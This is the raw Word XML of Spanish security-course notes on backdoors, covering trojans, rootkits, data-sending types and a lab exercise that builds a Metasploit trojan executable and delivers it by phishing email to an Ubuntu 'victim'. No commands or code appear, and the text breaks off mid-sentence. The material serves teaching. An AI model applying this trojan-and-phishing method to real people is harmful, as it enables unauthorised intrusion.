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rPr>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UF4 Backdoors, Metasploit, Scapy y Ataques varios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000001">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4657725" cy="3052763"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4657725" cy="3052763"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wikipedia:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, ya que pueden haber sido diseñadas con la intención de tener una entrada secreta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Los “Backdoors” es una de las técnicas más míticas y conocidas en el ámbito de la seguridad, a aparecido en múltiples películas y series y es por eso que es un procedimiento tan extendido y conocido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Los “Backdoors” suelen estar asociados con huecos de seguridad o por que el programador de esa tecnología a habilitado ese servicio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Existen múltiples estrategias para inyectar un backdoor a un cliente. Ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Troyano:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> el usuario por ignorància instala o abre un ejecutable que no es lo que aparenta “addwared, spiward”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rootkit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">un ejecutable que manipula los ficheros del sistema para infectar y perpetuar el “Backdoor”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creación del “Backdoor” de forma local:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> el hacker entra físicamente y habilita el “Backdoor” de forma manual.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“Backdoor” propio de la aplicación: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">el creador del software adrede para controlar el usuario sin su consentimiento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipos de Backdoor en función de el envío de datos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Existen 2 categorías que indican si el “backdoor” espera señal de la red para recopilar información o realizar otra acción o bien el “backdoor” es autónomo y envía información de forma unidireccional hacia internet:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backdoors de entrada y salida (vulnerables a ser detectados por Firewalls o IDS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewalls de salida (más difíciles de detectar)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2857500" cy="1924050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14" name="image45.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image45.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2857500" cy="1924050"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejercicio de creación de un “backdoor” en ubuntu con “metasploit”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El objetivo de esta práctica es generar un ejecutable con cargas, este ejecutable contiene un sploit (troyano) que puede aprovechar las vulnerabilidades del firewall del sistema operativo de la víctima. La técnica imprescindible para que el usuario pueda tener ese fichero con carga es el “phishing” (engaño).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3286125" cy="2405063"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36" name="image74.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image74.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3286125" cy="2405063"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El ejecutable generado en esta práctica no devuelve nada en pantalla pero se pueden crear y modificar ejecutables legítimos con carga (payload).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Material necesario para la práctica:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Un kali linux con el metasploit en su última versión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Un ubuntu version 14 (victima).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Método para pasar el fichero “troyano” del kali linux al ubuntu (via email…).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Documentación de la práctica:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://astr0baby.wordpress.com/2012/11/20/hacking-ubuntu-12-04-lts-using-metasploit/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://elpuig.xeill.net/Members/jordifarrero/2014-15-seguretat-en-xarxes-sm2ab-diurn/uf4-scapy-python/hacking-ubuntu-metasploit/web-guardada-astr0baby/view</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Estos enlaces son la documentación de la práctica que comentamos anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En la web podemos leer el funcionamiento básico de la creación de un “backdoor” en el que observamos un primer script llamado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
